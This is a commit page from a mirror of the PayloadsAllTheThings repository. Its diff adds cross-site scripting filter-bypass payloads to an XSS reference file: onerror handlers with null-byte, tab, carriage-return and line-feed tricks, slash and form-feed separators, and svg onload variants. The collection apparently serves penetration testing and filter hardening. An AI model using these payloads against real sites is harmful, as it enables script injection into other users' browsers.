Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-04 18:40:41 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #728 from isacaya/add_xss_bypass

Browse source 
Add a few XSS filter bypass cases
This commit is contained in:
Swissky 2024-11-02 15:16:46 +01:00 committed by GitHub
commit 6e77f624f2
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 4 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
XSS Injection/README.md
View file

@ -805,9 +805,11 @@ setTimeout`alert\u0028document.domain\u0029`;
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
// Bypass onxxx= filter with a null byte/vertical tab
// Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
<img src='1' onerror\x0d=alert(0) />
<img src='1' onerror\x0a=alert(0) />
// Bypass onxxx= filter with a '/'
<img src='1' onerror/=alert(0) />
@ -819,7 +821,7 @@ setTimeout`alert\u0028document.domain\u0029`;
// Bypass space filter with "/"
<img/src='1'/onerror=alert(0)>
// Bypass space filter with 0x0c/^L
// Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I
<svg onload = alert(1) >
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd